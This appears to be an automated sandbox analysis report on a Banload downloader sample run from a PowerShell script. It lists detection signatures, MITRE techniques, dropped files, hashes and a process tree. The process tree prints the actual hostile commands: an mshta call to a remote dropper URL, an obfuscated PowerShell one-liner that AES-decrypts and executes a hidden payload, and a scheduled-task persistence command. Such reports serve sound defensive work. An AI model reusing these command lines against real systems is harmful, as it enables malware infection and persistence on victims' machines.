banload | 15c486428ca6ef7add4c57355497f270f2a38ed43c40b994933d67d5f7e664fc

Resubmissions

05-05-2024 18:11

240505-wsw3naca68 10

05-05-2024 18:02

240505-wmn5vsbh37 10

Analysis

max time kernel
193s
max time network
286s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
05-05-2024 18:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

target.ps1
Size

154B
MD5

e92339c8a8820df2920d180ffcc66d45
SHA1

23968fbc5ae4fdf48fd699dcfee8c417317b0444
SHA256

15c486428ca6ef7add4c57355497f270f2a38ed43c40b994933d67d5f7e664fc
SHA512

dba5d0942a75a139fb5c5d67f8421fa0bb3c6f351554677117c46a9136cd12d4940ca80ef94796dfc578dbe81000c08d02ac19709453b26ac810e0d1b6db7abe

Score

10^/10

banload downloader dropper evasion execution persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://fatodex.b-cdn.net/fatodex

Signatures

Banload
Banload variants download malicious files, then install and execute the files.
trojan dropper downloader banload

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

jdhw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	jdhw.exe

Blocklisted process makes network request 7 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	Process
2	832	mshta.exe
12	832	mshta.exe
14	832	mshta.exe
16	832	mshta.exe
17	832	mshta.exe
18	832	mshta.exe
22	2120	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

jdhw.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	jdhw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	jdhw.exe

Executes dropped EXE 2 IoCs

Processes:

jdhw.exeDavonevur.exe

pid	Process
1584	jdhw.exe
652	Davonevur.exe

Loads dropped DLL 3 IoCs

Processes:

jdhw.exe

pid	Process
1584	jdhw.exe
1584	jdhw.exe
1584	jdhw.exe

Registers COM server for autorun 1 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Processes:

jdhw.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\ = "%ProgramFiles%\\Windows Media Player\\mpvis.DLL"	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\ThreadingModel = "Apartment"	jdhw.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

jdhw.exemore.com

description	pid	Process	procid_target
PID 1584 set thread context of 2828	1584	jdhw.exe	80
PID 2828 set thread context of 2296	2828	more.com	82

Drops file in Windows directory 2 IoCs

Processes:

expand.exe

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
4892	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

regsvr32.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	regsvr32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	regsvr32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exe

pid	Process
4916	schtasks.exe

Modifies registry class 9 IoCs

Processes:

jdhw.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\TypeLib\ = "{C58F1580-0DF3-401C-93B1-2D9DDA61CF04}"	jdhw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Version	jdhw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\ = "%ProgramFiles%\\Windows Media Player\\mpvis.DLL"	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32\ThreadingModel = "Apartment"	jdhw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\TypeLib	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\Version\ = "1.0"	jdhw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\ = "AlchemyVis Class"	jdhw.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EEAF7AB-9B86-0A4B-E9E8-6422E70DF8B3}\InprocServer32	jdhw.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exejdhw.exemore.com

pid	Process
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
216	powershell.exe
216	powershell.exe
216	powershell.exe
2120	powershell.exe
2120	powershell.exe
2120	powershell.exe
1584	jdhw.exe
1584	jdhw.exe
2828	more.com
2828	more.com

Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

jdhw.exemore.com

pid	Process
1584	jdhw.exe
2828	more.com
2828	more.com

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	2120	powershell.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

powershell.exepowershell.exemshta.exepowershell.exejdhw.exemore.comregsvr32.execmd.execmd.exe

description	pid	Process	procid_target
PID 4892 wrote to memory of 216	4892	powershell.exe	74
PID 4892 wrote to memory of 216	4892	powershell.exe	74
PID 216 wrote to memory of 832	216	powershell.exe	75
PID 216 wrote to memory of 832	216	powershell.exe	75
PID 832 wrote to memory of 2120	832	mshta.exe	76
PID 832 wrote to memory of 2120	832	mshta.exe	76
PID 2120 wrote to memory of 1584	2120	powershell.exe	78
PID 2120 wrote to memory of 1584	2120	powershell.exe	78
PID 1584 wrote to memory of 2828	1584	jdhw.exe	80
PID 1584 wrote to memory of 2828	1584	jdhw.exe	80
PID 1584 wrote to memory of 2828	1584	jdhw.exe	80
PID 1584 wrote to memory of 2828	1584	jdhw.exe	80
PID 2828 wrote to memory of 2296	2828	more.com	82
PID 2828 wrote to memory of 2296	2828	more.com	82
PID 2828 wrote to memory of 2296	2828	more.com	82
PID 2828 wrote to memory of 2296	2828	more.com	82
PID 2828 wrote to memory of 2296	2828	more.com	82
PID 2296 wrote to memory of 2908	2296	regsvr32.exe	83
PID 2296 wrote to memory of 2908	2296	regsvr32.exe	83
PID 2296 wrote to memory of 2908	2296	regsvr32.exe	83
PID 2908 wrote to memory of 4864	2908	cmd.exe	85
PID 2908 wrote to memory of 4864	2908	cmd.exe	85
PID 2908 wrote to memory of 4864	2908	cmd.exe	85
PID 2296 wrote to memory of 3040	2296	regsvr32.exe	86
PID 2296 wrote to memory of 3040	2296	regsvr32.exe	86
PID 2296 wrote to memory of 3040	2296	regsvr32.exe	86
PID 3040 wrote to memory of 4916	3040	cmd.exe	88
PID 3040 wrote to memory of 4916	3040	cmd.exe	88
PID 3040 wrote to memory of 4916	3040	cmd.exe	88

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\target.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . mshta.exe https://fatodex.b-cdn.net/fatodex
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://fatodex.b-cdn.net/fatodex
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory
    PID:832
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function DREeX($LWLOOBaM){return -split ($LWLOOBaM -replace '..', '0x$& ')};$zJmEepa = DREeX('FB7B0A5BDDA8D362B80F07A7D5531D62B890251A285AA2B74CC1546CE957F65F77729D219F4EADB2C7AB5DA5C639642B264AC843F39FEAC517124A3BD072157E8B0F5DDBAD3A23698D69AB8244E7FDADC3F0B728435A74338C3B2BE898C36E1ADDE3B7780A2581385C9EEF7A7023553CB81BB1D64D489F562A0D200979C2F862D1ED963CA439C0DA86325411C79282C993B218CC6AC4D7C5B954225AF8207E74F3D8B246D464DDD4056A464200169365A1BA93AD1D4F260F5CDC38F2F258DCA1CFA0FBACD4CAA6F170CD9D5A8F4936B0580C5F72019A310EE8DAB39636BE7497FFBB2FA76336995A7498BC08EF0786E8D4EB4E2C2C8472B7D5E11B98E9F1D2F2B183F47F74C55D2953DEFA3608201A996280A40D4EA4032E3669283D502A6E7252566A2D300105C002F81CC2866CE4152A31C581425E2B339F5F6F277699B4B8640F274142A93C1133B07BCB2E1F36DCD4C18B1197339F5525C053848BE907825F35C4E0C5A192603F5BA473C6A6A62CD50BB1E8C8685B81DFA3B8047E04A954F181E7A82DA5844DB8F49BDF9F3D99665AD21B7925C0CDA1D44A1699FB707A3E1601843F6D7352308FCA948DB1A6AF19EB190A40B042C5CF55609615A59DA120448E63BB063176F5EB8480DD7ACF5D097CB386C4739480B67CFC8CECE7B1330079CB99A3E93FC9FD1EEC630380EAB351099652CDA6291B5CE11728956207D0A91DF6E6B19A54B8C65823EDD58C01E3B61A530570B4E5636F72E1492A0F83A978263E6D673DA1323F5623309337CFBF6A6BB86B4BF0B447D138CD10B26CC88309482F1FAB27C173DC34E79355F6C96539A109E145C56AD83F3B9B1FC2C296944C28B30F823741192FECC5EB45A6DAA70BF003F5210661CB16A24AB96922AEEDE06FE83B56254652DE87231038E9EEA68B6754C9766B30DBDAD6E7C20EF3786EC16CCBFFABC3FBA56DD3FA266FCD53458AFFE6CA169B09AA60814707DC7F5D62CA7D1E2BE6330DF024EA5A74F5B57D3D3FF3E9190852F20C649E126447D4CFE3772F9D29027C6E1CB98B3D0723502F19AF23EDA46CED4F9B22CCA2F947F0548364D409371682A086BD0FFC9F9699C954B714001024A4138F4BCDE21BF8BDCDEC63500409CA9AA12E7E8F73DE0681FED9B5C40375F0946521ABA6A8F96AA3A0AABDA6DEF8EAFAC4B49CDC0AA4991B63E86772965327311FDCDE98E2F5CEE70A5C5B8BF0DACD25AAE74E8A61F0C7A0622702E07413EAB584C62E1830D4260C33B00255A792BA352A5541EF164FF19F5DA6BFDF3B94290EFD09F5740C700A4E39037637B12C655646F4871D1019860586EEB24B6D1F17342258F188A4F2ECD6FC30737FDC38CCEB5C71C8578E84F7AD87EE859D1F0322C63EDFE9B9B3879F23D30E170B928E0B6644178DB6DE7E8926462CAD8E02DF2561FFE1BA1003E935C3E0F8426B78DD1F22A46B822F120308FEF67306B27298B7F37B82B6858A5BE16C1AF3728B421001B4A9C32FCE1ADE7D21DA1E7B44741C84458F77DA704AE26195B5684E633D1FD8E0C16501F1D74B4927F81C3457044D2338F2B2BACCB8F5314EAD6AE0D81DF18E3DD624B5ED9E07BACC1E1C8A5E3FA1E81C0E284045ED57FF3C5CDB185EE57540E91C0D79689DF28FBB4CE70104BFF39D65F4D91D0555B4E91FF9D14CC1735CC6C0654CD94CC9E129936C0B35EA7E45F869FD27FE21DBC8DB119B48C4F3A2282F751EE41BC616CF285B8DF1CE0367080E9D2CB822579E1E960C0C05CA2464B9D5C40D1279C17F38B10F14B960F347BAE6F8568252DFCE7197A4B9471A0F5FCBE581A11082C99976091BEB2C2ACE9185A223249D95DEA4BFD57CDE2C392E017609CCCC7A1D8CBDF2BAD732E614039F339D60BFD82F34C75D10446028FF33BC5197D05CEA8A943490ED864C6D94');$dOmDq = [System.Security.Cryptography.Aes]::Create();$dOmDq.Key = DREeX('47527379546E7A6A4656756270556B4E');$dOmDq.IV = New-Object byte[] 16;$RuOilBnC = $dOmDq.CreateDecryptor();$gmaSVzrdz = $RuOilBnC.TransformFinalBlock($zJmEepa, 0, $zJmEepa.Length);$HbnJsGINd = [System.Text.Encoding]::Utf8.GetString($gmaSVzrdz);$RuOilBnC.Dispose();& $HbnJsGINd.Substring(0,3) $HbnJsGINd.Substring(3)
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Users\Admin\AppData\Roaming\jdhw.exe
        
        "C:\Users\Admin\AppData\Roaming\jdhw.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Loads dropped DLL
        Registers COM server for autorun
        Suspicious use of SetThreadContext
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:1584
      - C:\Windows\SysWOW64\more.com
        
        C:\Windows\SysWOW64\more.com
        6⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:2828
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        C:\Windows\SysWOW64\regsvr32.exe
        7⤵
        Checks processor information in registry
        Suspicious use of WriteProcessMemory
        
        PID:2296
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c expand.exe "C:\Users\Admin\AppData\Roaming\ServiceData\c2Gt4H.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceData"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2908
        
        C:\Windows\SysWOW64\expand.exe
        
        expand.exe "C:\Users\Admin\AppData\Roaming\ServiceData\c2Gt4H.tmp" -F:* "C:\Users\Admin\AppData\Roaming\ServiceData"
        9⤵
        Drops file in Windows directory
        
        PID:4864
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c schtasks /create /tn \Service\Data /tr """"C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe""" """C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3040
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \Service\Data /tr """"C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe""" """C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
        9⤵
        Creates scheduled task(s)
        
        PID:4916

C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe
C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe "C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg"
1⤵
- Executes dropped EXE
PID:652

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
b49a31b6e3a6771dbfa29b309842ef4f

SHA1
6b837a896a3008be212e7a3e297859b06b1d22af

SHA256
066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81

SHA512
804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1a3d2c65f8eca70f18df057686e8dd4b

SHA1
56dd36163b924ee68ed09e58432085a81d61c90d

SHA256
9064d8b915e2bfa7c0cb2d89c317214e089788c9b7dfc80bbe665b787cc47e12

SHA512
0a8a16d943d79b72741928a2974fd9fe8e57784d744cb543a2f969fae857405306a7c6a1d046a6fb1fe907dfaa98f116aeea6dcf539c5fd7e14f173acb741e9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xapt4i3h.s2m.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\a44fa2d8

Filesize
1.4MB

MD5
ae8d8f5541cb3f20cbbc2401a5ed7c5e

SHA1
056628b1226bd1c9d0b62803c0b48ac358c84ac6

SHA256
55d3645b5ae33fe88edd23f3a4acacf688b13ebea1772522b772c0d5f7a383a2

SHA512
ced43530c079fe8c66a42660f0c9fbd4edb8d40167696da6719184618df8a7dda7dd7fc464618daf73b95531ea79d135fba76fb0f458fd4be5e359e6dd1a4a38

Download Submit
C:\Users\Admin\AppData\Roaming\ACDBASE.DLL

Filesize
2.9MB

MD5
dace23695dcfa0f7309b65366ac75bc0

SHA1
c5b1bad2dec36852fae90f81f0dbd00518479c01

SHA256
cf8b85beeff99b13d06ed15c79e555ab74e30dfa1491a36c4332f54ed09887e4

SHA512
0e1e5fc158fb39c3c3c7733226cb846407cd01ca1c49800fb7668134ebef129ab43030f2768a8b149b5ba9a18b2d1b0f8bf23d1a8de487a482e9268e0b679bbb

Download Submit
C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.exe

Filesize
925KB

MD5
0adb9b817f1df7807576c2d7068dd931

SHA1
4a1b94a9a5113106f40cd8ea724703734d15f118

SHA256
98e4f904f7de1644e519d09371b8afcbbf40ff3bd56d76ce4df48479a4ab884b

SHA512
883aa88f2dba4214bb534fbdaf69712127357a3d0f5666667525db3c1fa351598f067068dfc9e7c7a45fed4248d7dca729ba4f75764341e47048429f9ca8846a

Download Submit
C:\Users\Admin\AppData\Roaming\ServiceData\Davonevur.jpg

Filesize
495KB

MD5
b36280ab2514b1772d2058fe14633850

SHA1
57b4b40365eb4e26aa9f9125acc9965210776195

SHA256
a3b628be13ef3a1f09ab8e4af4f59203e7e721283bd9414f2a35c03abd0ecf46

SHA512
7c13c658c2be4430aa7e6fa4a6b6116a91e5cf5c9ce425eb698236193b96d12656d264ce3f19940a17b8a59f7b7e5dfb1ea0c0c9dc381a788c3acf4f8fdfddfa

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-convert-l1-1-0.dll

Filesize
25KB

MD5
9f812bd3815909e559b15cb13489f294

SHA1
df751c956f59b4e3c82496d86895adc7cc1a1619

SHA256
ce6fcc2ddf21720c92bee04f5736a4787acffa970a1b0dbeea39ff5efec52c75

SHA512
0a360e8b81bf80cb6bdf240d627ddcf71b1a4ca42759de61b2d27fab521a8e6e3afa308cc69caf5a7c8b14d98d3d448f0d400ae1826cbe7d0f0ceafd14682064

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-environment-l1-1-0.dll

Filesize
21KB

MD5
1a72e5f24214eb723e03a22ff53f8a22

SHA1
578d1dbfb22e9ff3b10c095d6a06acaf15469709

SHA256
fda46141c236a11054d4d3756a36da4412c82dd7877daad86cb65bf53d81ca1a

SHA512
530e693daecc7c7080b21e39b856c538bb755516aafdb6839a23768f40bcfc38d71b19586e8c8e37bb1c2b7a7c31fcb8e24a2315a8dd90f50fec22f973d86cb4

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-heap-l1-1-0.dll

Filesize
21KB

MD5
9d136bbecf98a931e6371346059b5626

SHA1
2466e66bfd88dd66c1c693cbb95ea8a91b9558cd

SHA256
7617838af1b589f57e4fe9fee1e1412101878e6d3287cdc52a51cd03e3983717

SHA512
8c720c798d2a06f48b106a0a1ef38be9b4a2aebe2a657c8721278afa9fdbab9da2a672f47b7996ca1ce7517015d361d77963c686e0ae637a98c32fd75e5d0610

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-runtime-l1-1-0.dll

Filesize
25KB

MD5
6b39d005deb6c5ef2c9dd9e013b32252

SHA1
79a0736454befd88ba8d6bd88794d07712e38a67

SHA256
b0e50572eb82a46ed499775e95bfde7cb25c498957432c18c20cf930f332efd0

SHA512
50bc1f669499589a480379d72166dae701914427d51223994d63a0363420ca6fdde07010803270a62451afea9e4ae55206d8a4c00ca4680e7a9120cd33f99a0f

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-stdio-l1-1-0.dll

Filesize
25KB

MD5
97f24295c9bd6e1acae0c391e68a64cf

SHA1
75700dce304c45ec330a9405523f0f22e5dcbb18

SHA256
189d551fb3cba3dbb9b9c1797e127a52ac486d996f0ac7cba864fe35984a8d28

SHA512
cac75f623545c41b2597a25c14f2af7eb93e3e768b345d3b0e1928d8fd1f12bec39b18b8277f9550aa6a66d9cfe1bf6c3db93ae1eb2a6c07019d4f210b3e5998

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-string-l1-1-0.dll

Filesize
25KB

MD5
d282a4fa046d05d40d138cc68c518914

SHA1
d5012090399f405ffe7d2fed09650e3544528322

SHA256
8b1471101145343da5f2c5981c515da4dfae783622ed71d40693fe59c3088d7a

SHA512
718926e728627f67ba60a391339b784accd861a15596f90d7f4e6292709ac3d170bcbca3cbf6267635136cb00b4f93da7dfd219fa0beee0cf8d95ce7090409e4

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-time-l1-1-0.dll

Filesize
21KB

MD5
6d35a57a6d8d569f870b96e00e7f1f4d

SHA1
8407bdb3cd5ec15b2ce738b3dbd704aa289ce3e1

SHA256
f41511e477a164eb9451ca51fb3810437f3b15f21e6f5c6ce0956e84ec823723

SHA512
4317b86d32ca93e5f0d832819cf1ab8af68e853a19eb07dd1fa4d168a0b2a8eab309194884ed3a613b09fc6d511be872a053f76f00ea443499006cdd226fea8f

Download Submit
C:\Users\Admin\AppData\Roaming\api-ms-win-crt-utility-l1-1-0.dll

Filesize
21KB

MD5
8ed70910380aa0b28317512d72762cc0

SHA1
0421518370f24f9559f96459d0798d98b81ea732

SHA256
f15af0db93d9385ff9d8efdc06aacd0729d0dfcb66e91ca0243bb160f2ed89d0

SHA512
b31ef07eaac310fdd3df3546246e7dc696595b8e92141e3db79a44ddc3358b12129e3829a53c76d0fef214e3f29dba77fa5d556211830a140ea34ff62258d9d7

Download Submit
C:\Users\Admin\AppData\Roaming\callup.zip

Filesize
1.1MB

MD5
daa5d063fd362d8cd05dcb53b325d7d5

SHA1
88633bf31cbdc381c7a9a0e4321546de3eca7720

SHA256
2d5782626d017e182a02c5a21466310fb5d8b73ab215c62cdc165ba27707e802

SHA512
141c54a4d88ef01581f3a96961c3542b0115b2aa9448d768ab288ccdeefceaa38ec59a64afe00f2ff4d93fa4043b92c9ec4cd769a0fa4cf1943b2090042e9464

Download Submit
C:\Users\Admin\AppData\Roaming\jdhw.exe

Filesize
8.5MB

MD5
98169506fec94c2b12ba9930ad704515

SHA1
bce662a9fb94551f648ba2d7e29659957fd6a428

SHA256
9b8a5b0a45adf843e24214b46c285e44e73bc6eaf9e2a3b2c14a6d93ae541363

SHA512
7f4f7ac2326a1a8b7afc72822dae328753578eb0a4ffcec5adb4e4fb0c49703070f71e7411df221ee9f44d6b43a0a94921fe530877c5d5e71640b807e96def30

Download Submit
C:\Users\Admin\AppData\Roaming\leap.zip

Filesize
45KB

MD5
08f543471fca769417d792fa915ec287

SHA1
e1b010978178cfa854ebcbd7db2c7fd05cb1e267

SHA256
42fa279d41b30afdd4a016c64d64ea5967417179912e2d471be18a0a850d1cae

SHA512
a61a0310910a46dfd1755699eb5abae608572af0b0e5e7fd5faf9501f2c4d05e60d07a1886fd5c33c1d0730dd8c99993cf29086bbe052f226a0528445ebe4a2d

Download Submit
\??\c:\users\admin\appdata\roaming\servicedata\c2gt4h.tmp

Filesize
491KB

MD5
9533ba8d9930f60f0b6257bdb79b2384

SHA1
b0b9dc920e83343784e818dcf4d9607de51118bb

SHA256
6a30579a54855ff5899cd73278d61e6b3d69abadc7ffedc6c0e0c3aa03594131

SHA512
e86c782b98b28e8eefc03cb703eb2c640d6b748285b76c93f8a892e2427a20de00c7dd4c141e1c38e69b2f78b54f6705e2ae40071aaba0392193fc1a7071259d

Download Submit
\Users\Admin\AppData\Roaming\libmmd.dll

Filesize
4.0MB

MD5
f3918c71ae05882f8d47b776596dc5f2

SHA1
36e52c01b24db9d2daa36cf76697e5612d5c1470

SHA256
16a5bc32f74bbb0c1919cd18ce1cd64dfcf6a6ba90c35c9dd44791c3f464c17a

SHA512
45db3576b3ce685e361905d2fd8ecc96d8b7157d7113e6d41922dc5dbc04ace62ace113c09eeba36a6e4c70f94e39a1dadea4a39cf6cc7e87af166e14000af5a

Download Submit
\Users\Admin\AppData\Roaming\vcruntime140.dll

Filesize
116KB

MD5
699dd61122d91e80abdfcc396ce0ec10

SHA1
7b23a6562e78e1d4be2a16fc7044bdcea724855e

SHA256
f843cd00d9aff9a902dd7c98d6137639a10bd84904d81a085c28a3b29f8223c1

SHA512
2517e52f7f03580afd8f928c767d264033a191e831a78eed454ea35c9514c0f0df127f49a306088d766908af7880f713f5009c31ce6b0b1e4d0b67e49447bfff

Download Submit
memory/216-37-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

Filesize
9.9MB

Download
memory/216-55-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

Filesize
9.9MB

Download
memory/216-42-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

Filesize
9.9MB

Download
memory/216-40-0x00007FF868DC0000-0x00007FF8697AC000-memory.dmp

Filesize
9.9MB

Download
memory/832-527-0x00000230E2730000-0x00000230E275F000-memory.dmp

Filesize
188KB

Download
memory/832-77-0x00000230E2730000-0x00000230E275F000-memory.dmp

Filesize
188KB

Download
memory/1584-534-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-571-0x00007FF87CF80000-0x00007FF87D0EA000-memory.dmp

Filesize
1.4MB

Download
memory/1584-549-0x00007FF87CF80000-0x00007FF87D0EA000-memory.dmp

Filesize
1.4MB

Download
memory/1584-532-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-514-0x0000000003EC0000-0x00000000040A8000-memory.dmp

Filesize
1.9MB

Download
memory/1584-540-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-537-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-536-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-535-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/1584-539-0x0000000000400000-0x0000000001CF7000-memory.dmp

Filesize
25.0MB

Download
memory/2120-133-0x000001E2309C0000-0x000001E2309CA000-memory.dmp

Filesize
40KB

Download
memory/2120-120-0x000001E2309A0000-0x000001E2309B2000-memory.dmp

Filesize
72KB

Download
memory/2296-579-0x0000000000830000-0x0000000000F65000-memory.dmp

Filesize
7.2MB

Download
